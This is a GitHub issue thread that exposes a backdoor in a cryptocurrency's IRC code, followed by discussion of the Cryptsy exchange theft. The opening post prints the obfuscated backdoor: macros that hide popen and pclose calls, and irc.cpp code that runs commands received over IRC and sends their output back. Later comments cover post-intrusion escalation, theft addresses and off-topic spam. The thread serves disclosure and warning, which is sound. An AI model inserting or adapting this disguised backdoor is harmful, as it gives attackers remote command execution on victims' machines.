backdoor in IRC code

[dooglus]

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

[n4ru]

Too little too late, sadly.

[BitPopCoin]

First of all, are they retarded and not put each shitcoin in a vm? Second vern probably stole it and is now in China.

No vm and no manual compiling of random shitcoin? Vern cant keep his lies straight. I segregated my own bitpopcoin even when I compiled it myself. DO is only $5/month.

This Trojan is just a story vern found after the fact to facilitate his lies.

[presstab]

good find dooglus

[creativecuriosity]

Too little too late, sadly.

....

dooglus commented on Mar 8, 2015

[ofeefee]

Whoa!

[n4ru]

@CreativeCuriousity

That's about a year after the theft took place.

[presstab]

First post I can find about this backdoor is from BCT mods https://bitcointalk.org/index.php?topic=935898.0

[saddam213]

That's actually quite clever, added this one to my exploit scanner script

Good spotting sir

[mrzacsmith]

So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result. I mean, seems since a 'newbie' on btctalk with an account one day old would warrant some review at a minimum when dealing with such a serious topic. I feel for all in the crypto community that lost coins due to either greed, fraud or incompetence.

[dooglus]

Apparently this is the theft transaction, included In block 313009 (2014-07-29), 8 months before my bug report.

Good spotting sir

I can't take any credit for spotting it. I originally heard of this backdoor in this forum post (January 25, 2015), was curious how the exploit worked, and ended up posting the macro code here so others could more easily understand it, and also to warn others who might fork this codebase.

[sidhujag]

Interesting that the coins havent moved? Would be funny if he accidentily sent to an address he didnt own lol

[mrzacsmith]

HAHA, that would be well deserved @sidhujag ~~ least the scum would not profit and still have an army of crypto fans hunting his head.

[saddam213]

Cryptsy never should have had that much in hot wallets, 300k LTC and 16K in hot wallet, ridiculous

So any head hunting should be directed at them IMO

[dooglus]

Would be funny if he accidentily sent to an address he didnt own

Actually 11 different addresses that he didn't own...

Who steals 11k BTC and takes the time to split them up into 11 separate addresses in the theft transaction? That is just bizarre.

[mrzacsmith]

@dooglus so true, could see it happening to one address, but 11 mistakes is highly improbable. I wonder if anyone has went through the LTC blockchain to see if 300k happened the same or near the same time.

[sidhujag]

maybe 11 people were involved lol

[StarenseN]

dooglus you nailed it. Waw.

[jwg4]

Closing this as WONTFIX. This is a feature not a bug people.

[BitPopCoin]

Correct won't fix, busy on permanent vacation

[doged]

noticed this was also placed in torcoin

https://github.com/torcoindev/torcoin/blob/419f77729f1bf7fc0c3543d7e88e9c6a12e401a2/src/irc.cpp

[doged]

@jwg4 XD

[DanielJoyce]

also torcoin on reddit was created around the same time all of these backdoors were landing in various ignored/defunct/marginal cryptocurrencies

[DanielJoyce]

Looks all the torcoin accounts went silent after the cyptsy hack was successful.

https://cryptocointalk.com/topic/13084-torcoin-tor-information/

Check the twitter links. Dead since july 2014

[shinohai]

^LOL

[Meler-Andy]

No way Why always poor people have to loose :( I m so sad now lost plenty of coins from that backdoors now Cryptsy wont give them back :( sad angry and feel like i wanna start being a thief !!!!

[ctrlcctrlv]

@BitPopCoin At least segregate coins in different VMs depending on their total value - it's absurd that Vern would run random shitcoin wallet on the same machine as a private key with thousands of BTC. Also, that makes it a hot wallet, not cold storage as Vern claimed.

Cryptsy incompetent since day 1.

[Frankenmint]

ITT a shiton of people who come here after the fact when the OP found this nearly a year ago

[dooglus]

@ctrlcctrlv We don't know for sure that the lucky7coin and Bitcoin wallets were on the same server. It's possible the lucky7 backdoor was used to gain entry to the 'shitcoin' VM, and from there access was somehow gained to other servers.

[BitPopCoin]

This thread has no moderators hahaha.

[Javihache]

Litecoin is cool. Better Conf Times and all, scrypt... I like Litecoin, find it cool to have the "silver" and the "gold". But I still would like to know from you programming guys (I mean real programmers not like me), if there is a way to find out who that alerj78 is and how can be tracked down. Cause through stealing from Cryptsy, he stole from me and many others. And that is not cool.

[doged]

@Javihache it was most likely not this coin that is responsible, as i tested this and the way cryptsy is set up, it would not have been possible to steal bitcoins using this backdoor. this daemon would have to have been run as root, and not in its own vm.. so most likely this backdoor is not how cryptsy's bitcoin went missing.

[dooglus]

@doged Why do you say the daemon would need to have been run as root? I don't think that is the case.

[doged]

@dooglus you're correct, it would have to have been on the same machine as the cold storage bitcoin wallet though, and had permissions.

[jwg4]

@doged: Typically a backdoor like this is used to get the first toehold on a target system. Once that has been done, different privilege escalation bugs or attacks to various services can be used to get admin access and/or access to other systems on the target network. This might include traditional software vulnerabilities, or things like searching emails for plaintext passwords, spying on terminal sessions, searching for code repositories or databases for critical data. Unless the system is built to be very robust internally, with security planned on the basis that backdoors like this one will exist, these attempts will usually succeed. People often don't secure their systems from attackers who have partial privileges, and they often don't monitor systems and check logs effectively, which should enable you to find an attacker during this process.
Cryptsy claim that it took several months from the time they installed this code for the attacker to be able to take over their BTC and LTC wallets. This could have been the time taken to go from a single backdoor executing as a non-privileged user on an isolated VM running this coin, to having access to the most secret and valuable information held by Cryptsy.

[pceccato]

pardon my ignorance, but why would a crypocoin node require an IRC connection?

[BitPopCoin]

To find nodes to connect to

[karelbilek]

Even bitcoin has that

[BitPopCoin]

No bitcoin stopped that. Also it was never used in that direction.

[Glittergates]

I broke the bank

[n4ru]

blast from the past

[ctrlcctrlv]

lol remember when this shitcoin exchange still existed and had people defending it

[BitPopCoin]

lol remember when this shitcoin exchange still existed and had people defending it

So long ago

[n4ru]

lol remember when this shitcoin exchange still existed and had people defending it

fancy seeing you here

[ctrlcctrlv]

those sure are words

[Glittergates]

The 777-coins block occurs approximately 3-8% and 7777-coins block occurs approximately 0.5-2%, depends on the blockchain "luck". So have fun and hope for luck 7s!

Lucky7Coin also provides 5% annual interest on the coins held. The interest is paid about every 2 weeks.

No Premine.

Specifications: - 60 seconds block target - 77 coins per block for normal blocks - 777 or 7777 coins per block for super blocks depends on the number of lucky 7s - Difficulty retargets every block - mining payout will be halved every half year (259200 blocks) - mining coins per block will not be lower than 1 coin per block - Expected total mined coins will be 99,792,000 coins - 7 confirmations for transaction - 77 confirmations for minted blocks - Total coins (hard limit): 500 millions

The unit of account of the bitcoin system is the bitcoin. Currency codes for representing bitcoin are BTC[a] and XBT.[b][23]: 2  Its Unicode character is ₿.[1] One bitcoin is divisible to eight decimal places.[6]: ch. 5  Units for smaller amounts of bitcoin are the millibitcoin (mBTC), equal to 1⁄1000 bitcoin, and the satoshi (sat), which is the smallest possible division, and named in homage to bitcoin's creator, representing 1⁄100000000 (one hundred millionth) bitcoin.[2] 100,000 satoshis are one mBTC

7x7x7 =343 =

[justinvforvendetta]

this code wasnt built by vern

[ctrlcctrlv]

yum word salad

[Glittergates]

alot of spectators what i figured

[karelbilek]

what the hell is this, I get 20 notifs in last 1 hour...

[Glittergates]

Link too my bitcoin https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

[ctrlcctrlv]

@karelbilek looks like a psychotic break

[ctrlcctrlv]

indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

[Glittergates]

I'am here for my money nothing more https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

[rascal777]

Looks like the Cryptsy funds have been moving.

[Glittergates]

Thats crazy post the transactions of block

[Glittergates]

Looks like the Cryptsy funds have been moving.

Thats crazy post the transactions of block

[rascal777]

Looks like coins have been spread out using a mixer. Hopefully this address has been red Flagged in the Bitcoin system, if that is possible. For example, Here is one address containing some split off funds: bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz or https://www.blockchain.com/explorer/addresses/btc/bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz

[rascal777]

Actually, looks like a lot of the transactions got sent to Binance? So Binance should know whos account this is. for example this transaction: https://www.blockchain.com/explorer/transactions/btc/1ebcc90100d82b1e5b1ea8434e2c092dc9a5cb601cc613a5c5508d6892f7e7d1 The Transaction before this one shows 2 Bitcoins sent to Binance. https://www.blockchain.com/explorer/transactions/btc/914e44c2af89fb27ba8a8b83e079c7510baec45459ce78a7372170ae8c181698